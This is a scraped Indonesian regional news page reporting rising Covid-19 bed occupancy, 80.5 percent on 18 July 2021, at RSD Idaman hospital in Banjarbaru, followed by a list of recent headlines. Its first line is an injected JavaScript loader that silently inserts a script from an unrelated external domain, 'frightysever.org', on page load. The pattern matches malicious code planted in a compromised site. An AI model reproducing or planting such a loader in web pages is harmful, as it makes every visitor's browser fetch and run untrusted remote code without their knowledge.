(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarbaru

WASPADA. Kasus Covid-19 Bertambah, Keterisian Tempat Tidur RSD Idaman Capai 80,5 Persen!


KANALKALIMANTAN.COM, BANJARBARU – Meningkatnya kasus positif Covid-19 di Banjarbaru mempengaruhi kapasitas terpakai rawat inap yang biasanya disebut Bed Occupancy Rate (BOR) atau persentase penggunaan tempat tidur.

Data update dari Satuan Tugas (Satgas) Covid Banjarbaru menunjukkan bahwa kasus positif bertambah 23 orang pada Minggu (18/7/2021).

Kepala Seksi Pelayanan Medik RSD Idaman, Banjarbaru, dr Siti Ningsih saat dihubungi oleh Kanalkalimantan.com menampilkan data BOR pada laporan RS Rujukan RSD Idaman.

Dilaporkan bahwa saat ini BOR sudah mencapai 80,5 persen sedangkan diketahui batas aman BOR rumah sakit yang ditetapkan oleh WHO (World Health Organization atau Organisasi Kesehatan Dunia) hanya 60 persen.

 

 

Baca juga: Cara Protes Kafe di Tengah PPKM Darurat, Khusus PNS Harga 3 Kali Lipat

Itu artinya, sekarang kapasitas keterisian tempat tidur di RSD Idaman Kota Banjarbaru sudah melebihi batas aman.

Per Minggu (18/7/2021) jumlah tempat tidur yang tersedia untuk Covid-19 (ISO dan ICU) sejumlah 77 ranjang, sedangkan yang terisi sudah 56. Persentase BOR-nya sudah 80,5 persen.

Baca juga: Pandemi Covid-19 di Kalsel Memasuki Gelombang Ketiga, Ini Kata Tim Pakar ULM!

Laporan ini mengalami peningkatan BOR dari hari-hari sebelumnya yaitu 81 persen pada Sabtu (17/7/2021), 75,6 persen pada Jumat (16/7/2021) dan Kamis (15/7/2021), 72,9 persen pada Rabu (14/7/2021), 70,2 persen pada Selasa (13/7/2021), 67,6 persen pada Senin (12/7/2021), dan 55,4 persen pada Minggu (11/7/2021).

Data ini menunjukkan bahwa dalam 7 hari peningkatan keterisian tempat tidur di RSD Idaman meningkat sebanyak 25,1 persen. (kanalkalimantan.com/nurul)

Reporter: nurul
Editor: cell


Al Ghifari

Recent Posts

Pascabanjir TurunTangan Banjarmasin – UPZ Bakti Bersama Salurkan Bantuan ke Masjid

KANALKALIMANTAN.COM, PARINGIN — Banjir bandang di Kecamatan Tebing Tinggi, Kabupaten Balangan, beberapa waktu lalu tak… Read More

2 jam ago

Mantan Kajari HSU Ajukan Praperadilan, KPK Siap Ladeni Gugatan

KANALKALIMANTAN.COM, JAKARTA - Komisi Pemberantasan Korupsi (KPK) menyatakan siap menghadapi gugatan praperadilan yang diajukan mantan… Read More

6 jam ago

Hari Gizi Nasional 2026 “Sehat Dimulai dari Piringku”

KANALKALIMANTAN.COM - Hari Gizi Nasional yang diperingati setiap tanggal 25 Januari merupakan momentum penting dalam… Read More

9 jam ago

Wali Kota Yamin akan Tindak Pemilik Ruko yang Tidak Merawat Drainase

KANALKALIMANTAN.COM, BANJARMASIN — Wali Kota Banjarmasin H Muhammad Yamin HR menegaskan akan menindak pemilik Ruko… Read More

24 jam ago

Ketua DPRD Kalsel Sampaikan Tuntutan Mahasiswa ke Senayan

KANALKALIMANTAN.COM, JAKARTA — Ketua DPRD Kalimantan Selatan (Kalsel), H Supian HK menyampaikan tuntutan mahasiswa dari… Read More

1 hari ago

275 ASN Pemko Banjarmasin Pensiun di 2025

KANALKALIMANTAN.COM, BANJARMASIN — Sebanyak 275 Aparatur Sipil Negara (ASN) di lingkungan Pemerintah Kota (Pemko) Banjarmasin… Read More

1 hari ago

This website uses cookies.